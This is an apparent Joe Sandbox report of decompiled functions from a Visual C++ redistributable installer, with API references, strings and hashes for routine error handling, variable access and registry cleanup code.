                                                                          • Instruction ID: 9acc5e1d2f9f02a3f31e817d7a644598d687b1e8bc620f48ab7d4ed1afd67b04
                                                                          • Opcode Fuzzy Hash: e6f6585edfd8ccf36f0e912e06a784c72c0f85a76fbae06017c0bf854b81ff15
                                                                          • Instruction Fuzzy Hash: 07117C76D05619FBCF22AB94DD41CEEFBB8EF40712B1041A6FD00A6221DB319A849B81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			E000460E2(void* __ecx) {
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				intOrPtr _t2;
                                                                          				void* _t4;
                                                                          				void* _t10;
                                                                          				void* _t11;
                                                                          				void* _t13;
                                                                          				void* _t15;
                                                                          				void* _t16;
                                                                          				long _t17;
                                                                          
                                                                          				_t11 = __ecx;
                                                                          				_t17 = GetLastError();
                                                                          				_t10 = 0;
                                                                          				_t2 =  *0x7a05c; // 0x6
                                                                          				_t20 = _t2 - 0xffffffff;
                                                                          				if(_t2 == 0xffffffff) {
                                                                          					L2:
                                                                          					_t16 = E0004523F(_t11, 1, 0x364);
                                                                          					_pop(_t13);
                                                                          					if(_t16 != 0) {
                                                                          						_t4 = E000488AE(_t10, _t13, _t16, __eflags,  *0x7a05c, _t16);
                                                                          						__eflags = _t4;
                                                                          						if(_t4 != 0) {
                                                                          							E00045ED0(_t13, _t16, 0x7b13c);
                                                                          							E0004511A(_t10);
                                                                          							__eflags = _t16;
                                                                          							if(_t16 != 0) {
                                                                          								goto L9;
                                                                          							} else {
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_push(_t16);
                                                                          							goto L4;
                                                                          						}
                                                                          					} else {
                                                                          						_push(_t10);
                                                                          						L4:
                                                                          						E0004511A();
                                                                          						L8:
                                                                          						SetLastError(_t17);
                                                                          					}
                                                                          				} else {
                                                                          					_t16 = E00048858(0, _t11, _t15, _t20, _t2);
                                                                          					if(_t16 != 0) {
                                                                          						L9:
                                                                          						SetLastError(_t17);
                                                                          						_t10 = _t16;
                                                                          					} else {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          				return _t10;
                                                                          			}














                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000100,00000000,00043E3B,000316CE,80004005,00000000,?,cabextract.cpp,000001C7), ref: 000460E7
                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00046150
                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00046159
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met
                                                                          • API String ID: 1452528299-2381362037
                                                                          • Opcode ID: 718519052ace20ff84832b3c24cd9ca005332134bf6d1fa2f88d6fad74033453
                                                                          • Instruction ID: 56532fc4755e028f436a755daa70371550ac8bb6afb28d1f226a6755763bd308
                                                                          • Opcode Fuzzy Hash: 718519052ace20ff84832b3c24cd9ca005332134bf6d1fa2f88d6fad74033453
                                                                          • Instruction Fuzzy Hash: E401F9F6600B0067971127346C46D6F369D9BD3772B280939F519A22A3FF2A8C05417E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 34%
                                                                          			E0001730C(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _t15;
                                                                          				void* _t22;
                                                                          
                                                                          				_t20 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				EnterCriticalSection(_a4);
                                                                          				_t22 = E00015C87(_t20, _a4, _a8,  &_v8);
                                                                          				_t15 = _v8;
                                                                          				if(_t22 < 0 ||  *((intOrPtr*)(_t15 + 0x18)) != 0) {
                                                                          					if(_t22 != 0x80070490) {
                                                                          						if(_t22 >= 0) {
                                                                          							_t22 = E0003006A(_t20, _t15 + 8, _a12);
                                                                          							if(_t22 < 0) {
                                                                          								_push(_a8);
                                                                          								_push("Failed to get value as numeric for variable: %ls");
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_push(_a8);
                                                                          							_push("Failed to get value of variable: %ls");
                                                                          							L8:
                                                                          							_push(_t22);
                                                                          							E0005012F();
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t22 = 0x80070490;
                                                                          				}
                                                                          				LeaveCriticalSection(_a4);
                                                                          				return _t22;
                                                                          			}







                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00017318
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0001737F
                                                                          Strings
                                                                          • Failed to get value of variable: %ls, xrefs: 00017352
                                                                          • Failed to get value as numeric for variable: %ls, xrefs: 0001736E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                                          • API String ID: 3168844106-4270472870
                                                                          • Opcode ID: 7b3da6e6f136f165c81b4c6f8ce2226bbf9128544a519cecff07217f57a601cb
                                                                          • Instruction ID: d29b4cf6971950aeffef56b42bcdd3e65512823e9da89546667ecee548cb7380
                                                                          • Opcode Fuzzy Hash: 7b3da6e6f136f165c81b4c6f8ce2226bbf9128544a519cecff07217f57a601cb
                                                                          • Instruction Fuzzy Hash: FF017C72945228FBCF265F54CC05ADE3B79EB04722F008125FD18AA221C3369FA0ABD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 38%
                                                                          			E00017481(void* __ecx, void* __edx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _t15;
                                                                          				void* _t21;
                                                                          				void* _t23;
                                                                          
                                                                          				_t21 = __edx;
                                                                          				_t20 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				EnterCriticalSection(_a4);
                                                                          				_t23 = E00015C87(_t20, _a4, _a8,  &_v8);
                                                                          				_t15 = _v8;
                                                                          				if(_t23 < 0 ||  *((intOrPtr*)(_t15 + 0x18)) != 0) {
                                                                          					if(_t23 != 0x80070490) {
                                                                          						if(_t23 >= 0) {
                                                                          							_t23 = E000301D0(_t20, _t21, _t15 + 8, _a12);
                                                                          							if(_t23 < 0) {
                                                                          								_push(_a8);
                                                                          								_push("Failed to get value as version for variable: %ls");
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_push(_a8);
                                                                          							_push("Failed to get value of variable: %ls");
                                                                          							L8:
                                                                          							_push(_t23);
                                                                          							E0005012F();
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t23 = 0x80070490;
                                                                          				}
                                                                          				LeaveCriticalSection(_a4);
                                                                          				return _t23;
                                                                          			}








                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0001748D
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 000174F4
                                                                          Strings
                                                                          • Failed to get value of variable: %ls, xrefs: 000174C7
                                                                          • Failed to get value as version for variable: %ls, xrefs: 000174E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                          • API String ID: 3168844106-1851729331
                                                                          • Opcode ID: f05a462bf445a448a2a1b882421d0341e596019888e6afebf7fac740ea0dac46
                                                                          • Instruction ID: 8d7623867c537f06df94514236d5c22bb4b0e3e0e55875a5b41f53f23eab5929
                                                                          • Opcode Fuzzy Hash: f05a462bf445a448a2a1b882421d0341e596019888e6afebf7fac740ea0dac46
                                                                          • Instruction Fuzzy Hash: 54017C32985229FFDF225F44CC05ADE3F78AB14722F108125FD08AA221C73A9E9097E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 31%
                                                                          			E00017410(void* __ecx, void* __edx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				void* _t20;
                                                                          				void* _t22;
                                                                          
                                                                          				_t20 = __edx;
                                                                          				_t19 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				EnterCriticalSection(_a4);
                                                                          				_t22 = E00015C87(_t19, _a4, _a8,  &_v8);
                                                                          				if(_t22 != 0x80070490) {
                                                                          					if(_t22 >= 0) {
                                                                          						_t22 = E0002FF73(_t20, _v8 + 8, _a12);
                                                                          						if(_t22 < 0) {
                                                                          							_push(_a8);
                                                                          							_push("Failed to copy value of variable: %ls");
                                                                          							goto L5;
                                                                          						}
                                                                          					} else {
                                                                          						_push(_a8);
                                                                          						_push("Failed to get value of variable: %ls");
                                                                          						L5:
                                                                          						_push(_t22);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				LeaveCriticalSection(_a4);
                                                                          				return _t22;
                                                                          			}







                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00019752,00000000,?,00000000,00000000,00000000,?,00019590,00000000,?,00000000,00000000), ref: 0001741C
                                                                          • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00019752,00000000,?,00000000,00000000,00000000,?,00019590,00000000,?,00000000), ref: 00017472
                                                                          Strings
                                                                          • Failed to get value of variable: %ls, xrefs: 00017442
                                                                          • Failed to copy value of variable: %ls, xrefs: 00017461
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                          • API String ID: 3168844106-2936390398
                                                                          • Opcode ID: e7f72531b16d9599a366430a639e0c1612ee69e75d3c43ff897ad401c255f8ba
                                                                          • Instruction ID: e45fb7379d57f02225b28501199d2d8caeb2c425039cb7572500005116fc76e2
                                                                          • Opcode Fuzzy Hash: e7f72531b16d9599a366430a639e0c1612ee69e75d3c43ff897ad401c255f8ba
                                                                          • Instruction Fuzzy Hash: 97F04F36944629BBCF126F54CC06EDF7F78EF15362F008124FD08AA221D7369A60ABD5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00041246() {
                                                                          				void* _t4;
                                                                          				void* _t8;
                                                                          
                                                                          				E00041854();
                                                                          				E000417E8();
                                                                          				if(E00041548() != 0) {
                                                                          					_t4 = E000414FA(_t8, __eflags);
                                                                          					__eflags = _t4;
                                                                          					if(_t4 != 0) {
                                                                          						return 1;
                                                                          					} else {
                                                                          						E00041584();
                                                                          						goto L1;
                                                                          					}
                                                                          				} else {
                                                                          					L1:
                                                                          					return 0;
                                                                          				}
                                                                          			}






                                                                          APIs
                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00041246
                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0004124B
                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00041250
                                                                            • Part of subcall function 00041548: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00041559
                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00041265
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                          • String ID:
                                                                          • API String ID: 1761009282-0
                                                                          • Opcode ID: 294756368ebb91e0d837f8d85631f380e5f2af2aa371e18ba28d844398db2aca
                                                                          • Instruction ID: 0ef7c4576b95a79595dbfaa09ea1c7ccc639484abdf47d01945b0f94fd56fa0a
                                                                          • Opcode Fuzzy Hash: 294756368ebb91e0d837f8d85631f380e5f2af2aa371e18ba28d844398db2aca
                                                                          • Instruction Fuzzy Hash: 1BC04CF8044611A41E6036F163423ED03C50FE238579010F5F866D75435D4A04FB603E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00054661(intOrPtr _a4) {
                                                                          				char _v8;
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				void* _v20;
                                                                          				char _v24;
                                                                          				signed short* _t64;
                                                                          				intOrPtr _t65;
                                                                          				intOrPtr _t67;
                                                                          				signed int _t78;
                                                                          				signed int _t79;
                                                                          				signed int _t80;
                                                                          				void* _t82;
                                                                          				intOrPtr _t83;
                                                                          				signed int _t84;
                                                                          				void* _t85;
                                                                          				signed int _t86;
                                                                          
                                                                          				_t86 = 0;
                                                                          				_v16 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v24 = 0;
                                                                          				_v20 = 0;
                                                                          				_t84 = E00050E3F(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager", 3,  &_v16);
                                                                          				if(_t84 != 0x80070002) {
                                                                          					if(_t84 >= 0) {
                                                                          						_t84 = E000510C5(_v16, L"PendingFileRenameOperations",  &_v8,  &_v12);
                                                                          						if(_t84 == 0x80070002) {
                                                                          							goto L1;
                                                                          						} else {
                                                                          							if(_t84 >= 0) {
                                                                          								_t78 = 0;
                                                                          								if(_v12 > 0) {
                                                                          									_t82 = 0x3f;
                                                                          									do {
                                                                          										_t64 =  *(_v8 + _t78 * 4);
                                                                          										if(_t64 == 0) {
                                                                          											L21:
                                                                          											_t65 = _v20;
                                                                          											goto L24;
                                                                          										} else {
                                                                          											_t79 =  *_t64 & 0x0000ffff;
                                                                          											if(_t79 == 0) {
                                                                          												goto L21;
                                                                          											} else {
                                                                          												_t85 = 0x5c;
                                                                          												if(_t85 == _t79 && _t82 == _t64[1] && _t82 == _t64[2] && _t85 == _t64[3]) {
                                                                          													_t64 =  &(_t64[4]);
                                                                          												}
                                                                          												_t84 = E00012D05( &_v24, _a4, _t64,  &_v24);
                                                                          												if(_t84 >= 0) {
                                                                          													if(_v24 != 2) {
                                                                          														_t65 = _v20;
                                                                          													} else {
                                                                          														_t69 = _v8;
                                                                          														if( *(_v8 + _t78 * 4) != _t86) {
                                                                          															E000554EF( *((intOrPtr*)(_t69 + _t78 * 4)));
                                                                          															 *(_v8 + _t78 * 4) = _t86;
                                                                          														}
                                                                          														_t71 =  *(_v8 + 4 + _t78 * 4);
                                                                          														if( *(_v8 + 4 + _t78 * 4) != 0) {
                                                                          															E000554EF(_t71);
                                                                          															 *(_v8 + 4 + _t78 * 4) = _t86;
                                                                          														}
                                                                          														_t65 = 1;
                                                                          														_v20 = 1;
                                                                          													}
                                                                          													_t82 = 0x3f;
                                                                          													goto L24;
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										goto L31;
                                                                          										L24:
                                                                          										_t78 = _t78 + 2;
                                                                          									} while (_t78 < _v12);
                                                                          									if(_t65 != 0) {
                                                                          										_t80 = _t86;
                                                                          										if(_v12 > _t80) {
                                                                          											do {
                                                                          												_t67 = _v8;
                                                                          												_t83 =  *((intOrPtr*)(_t67 + _t80 * 4));
                                                                          												if(_t83 != 0) {
                                                                          													 *((intOrPtr*)(_t67 + _t86 * 4)) = _t83;
                                                                          													_t86 = _t86 + 1;
                                                                          												}
                                                                          												_t80 = _t80 + 1;
                                                                          											} while (_t80 < _v12);
                                                                          										}
                                                                          										_v12 = _t86;
                                                                          										_t84 = E0005143C(_v16, L"PendingFileRenameOperations", _v8, _t86);
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					L1:
                                                                          					_t84 = _t86;
                                                                          				}
                                                                          				L31:
                                                                          				_t56 = _v8;
                                                                          				if(_v8 != 0) {
                                                                          					E00012647(_t56, _v12);
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					RegCloseKey(_v16);
                                                                          				}
                                                                          				return _t84;
                                                                          			}




















                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 000547C2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                          • API String ID: 47109696-3023217399
                                                                          • Opcode ID: 8afcfe8b236df276f884fcac9dcdab731aa2812911193bc42641e32e9e356e23
                                                                          • Instruction ID: 671497bb1baa9e530379a3546ba4c8849ec6017889541da2313df5b862cdc51a
                                                                          • Opcode Fuzzy Hash: 8afcfe8b236df276f884fcac9dcdab731aa2812911193bc42641e32e9e356e23
                                                                          • Instruction Fuzzy Hash: 6941C374E04219EFCB20DF94C885AEFB7F9EF49B06F214069E900AB211D7319E94CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 80%
                                                                          			E00050B49(void* __ecx, void* _a4, short* _a8, signed short _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				signed short _t32;
                                                                          				signed short _t33;
                                                                          				void* _t38;
                                                                          				signed short _t40;
                                                                          				signed short _t48;
                                                                          				void* _t49;
                                                                          				signed short _t52;
                                                                          				signed short _t55;
                                                                          				signed short _t56;
                                                                          				signed short _t57;
                                                                          				signed short _t58;
                                                                          				signed short _t60;
                                                                          				signed short _t61;
                                                                          				signed short _t62;
                                                                          
                                                                          				_t49 = __ecx;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v16 = _v16 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t48 = 0;
                                                                          				_t57 = _a12;
                                                                          				if(_a16 == 0) {
                                                                          					L8:
                                                                          					_t60 = 0;
                                                                          					__eflags =  *0x7b674 - _t48; // 0x0
                                                                          					if(__eflags != 0) {
                                                                          						L11:
                                                                          						_t58 = _t57 - 1;
                                                                          						__eflags = _t58;
                                                                          						if(_t58 == 0) {
                                                                          							_t48 = 0x200;
                                                                          						} else {
                                                                          							__eflags = _t58 == 1;
                                                                          							if(_t58 == 1) {
                                                                          								_t48 = 0x100;
                                                                          							}
                                                                          						}
                                                                          						_t32 =  *0x7b66c; // 0x0
                                                                          						__eflags = _t32;
                                                                          						if(_t32 == 0) {
                                                                          							_t33 = RegDeleteKeyW(_a4, _a8);
                                                                          							_t56 = 0x80070002;
                                                                          							__eflags = _t33;
                                                                          							_t52 =  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
                                                                          							__eflags = _t52 - 0x80070002;
                                                                          							if(_t52 == 0x80070002) {
                                                                          								goto L17;
                                                                          							}
                                                                          							__eflags = _t33;
                                                                          							if(_t33 == 0) {
                                                                          								goto L24;
                                                                          							}
                                                                          							_t61 = _t52;
                                                                          							_t38 = 0x80004005;
                                                                          							__eflags = _t61;
                                                                          							_t60 =  >=  ? 0x80004005 : _t61;
                                                                          							_push(_t60);
                                                                          							_push(0xfb);
                                                                          							goto L23;
                                                                          						} else {
                                                                          							_t40 =  *_t32(_a4, _a8, _t48, 0);
                                                                          							_t56 = 0x80070002;
                                                                          							__eflags = _t40;
                                                                          							_t55 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          							__eflags = _t55 - 0x80070002;
                                                                          							if(_t55 != 0x80070002) {
                                                                          								__eflags = _t40;
                                                                          								if(_t40 == 0) {
                                                                          									L24:
                                                                          									if(_v8 != 0) {
                                                                          										RegCloseKey(_v8);
                                                                          										_v8 = _v8 & 0x00000000;
                                                                          									}
                                                                          									if(_v12 != 0) {
                                                                          										E000554EF(_v12);
                                                                          									}
                                                                          									if(_v16 != 0) {
                                                                          										E000554EF(_v16);
                                                                          									}
                                                                          									return _t60;
                                                                          								}
                                                                          								_t62 = _t55;
                                                                          								_t38 = 0x80004005;
                                                                          								__eflags = _t62;
                                                                          								_t60 =  >=  ? 0x80004005 : _t62;
                                                                          								_push(_t60);
                                                                          								_push(0xf2);
                                                                          								L23:
                                                                          								_push("regutil.cpp");
                                                                          								E000137D3(_t38);
                                                                          								goto L24;
                                                                          							}
                                                                          							L17:
                                                                          							_t60 = _t56;
                                                                          							goto L24;
                                                                          						}
                                                                          					}
                                                                          					__eflags = _t57;
                                                                          					if(_t57 == 0) {
                                                                          						goto L11;
                                                                          					}
                                                                          					_t60 = 0x80070057;
                                                                          					goto L24;
                                                                          				}
                                                                          				_t60 = E00050E3F(_a4, _a8, 0x20019,  &_v8);
                                                                          				if(_t60 != 0x80070002) {
                                                                          					while(1) {
                                                                          						__eflags = _t60;
                                                                          						if(_t60 < 0) {
                                                                          							goto L24;
                                                                          						}
                                                                          						_t60 = E00050D1C(_t49, _v8, 0,  &_v12);
                                                                          						__eflags = _t60 - 0x80070103;
                                                                          						if(_t60 != 0x80070103) {
                                                                          							__eflags = _t60;
                                                                          							if(_t60 < 0) {
                                                                          								goto L24;
                                                                          							}
                                                                          							_t60 = E00012D79(_t49, _a8, _v12,  &_v16);
                                                                          							__eflags = _t60;
                                                                          							if(_t60 < 0) {
                                                                          								goto L24;
                                                                          							}
                                                                          							_t60 = E00050B49(_t49, _a4, _v16, _t57, _a16);
                                                                          							continue;
                                                                          						}
                                                                          						goto L8;
                                                                          					}
                                                                          					goto L24;
                                                                          				}
                                                                          				_t60 = 0;
                                                                          				goto L24;
                                                                          			}





















                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00050CA0
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 47109696-955085611
                                                                          • Opcode ID: f848cced0288d2b10bd4482bfd45fe21377c38d92720a6c8e918b7560e93c95a
                                                                          • Instruction ID: 786debc64343ddf289617ab1298808aa8ebaf1ca462daf742bcbca3b2d08d148
                                                                          • Opcode Fuzzy Hash: f848cced0288d2b10bd4482bfd45fe21377c38d92720a6c8e918b7560e93c95a
                                                                          • Instruction Fuzzy Hash: 0D41F432D01229FBEF215BA4CE45BAF7FE4AB04316F118269ED05AB160D3358D58DB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 89%
                                                                          			E00050F6E(void* _a4, short* _a8, char** _a12) {
                                                                          				signed int _v8;
                                                                          				int _v12;
                                                                          				int _v16;
                                                                          				void* _v20;
                                                                          				signed int _t37;
                                                                          				void* _t44;
                                                                          				signed short _t60;
                                                                          				char** _t64;
                                                                          				void* _t65;
                                                                          				void* _t66;
                                                                          
                                                                          				_t64 = _a12;
                                                                          				_v8 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v20 = 0;
                                                                          				if(_t64 == 0 ||  *_t64 == 0) {
                                                                          					L4:
                                                                          					_v8 = 2;
                                                                          					_t65 = E00011EDE(_t64, 2);
                                                                          					if(_t65 < 0) {
                                                                          						goto L20;
                                                                          					} else {
                                                                          						_t37 = _v8;
                                                                          						goto L6;
                                                                          					}
                                                                          				} else {
                                                                          					_t65 = E0001275D( *_t64,  &_v8);
                                                                          					if(_t65 < 0) {
                                                                          						L20:
                                                                          						if(_v20 != 0) {
                                                                          							E000554EF(_v20);
                                                                          						}
                                                                          						return _t65;
                                                                          					}
                                                                          					_t37 = _v8;
                                                                          					if(_t37 >= 2) {
                                                                          						L6:
                                                                          						_v16 = _t37 * 2 - 2;
                                                                          						_t60 = RegQueryValueExW(_a4, _a8, 0,  &_v12,  *_t64,  &_v16);
                                                                          						if(_t60 != 0xea) {
                                                                          							L9:
                                                                          							_t44 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                          							if(_t44 != 0x80070002) {
                                                                          								if(_t60 == 0) {
                                                                          									if(_v12 == 1 || _v12 == 2) {
                                                                          										( *_t64)[_v8 * 2 - 2] = 0;
                                                                          										if(_v12 == 2) {
                                                                          											_t65 = E000121A5( &_v20,  *_t64, 0);
                                                                          											if(_t65 >= 0) {
                                                                          												_t65 = E00013083(_t64, _v20, 1);
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										_t65 = 0x8007070c;
                                                                          										_push(0x8007070c);
                                                                          										_push(0x1ef);
                                                                          										L13:
                                                                          										_push("regutil.cpp");
                                                                          										E000137D3(_t44);
                                                                          									}
                                                                          									goto L20;
                                                                          								}
                                                                          								_t66 = _t44;
                                                                          								_t44 = 0x80004005;
                                                                          								_t65 =  >=  ? 0x80004005 : _t66;
                                                                          								_push(_t65);
                                                                          								_push(0x1dc);
                                                                          								goto L13;
                                                                          							}
                                                                          							_t65 = 0x80070002;
                                                                          							goto L20;
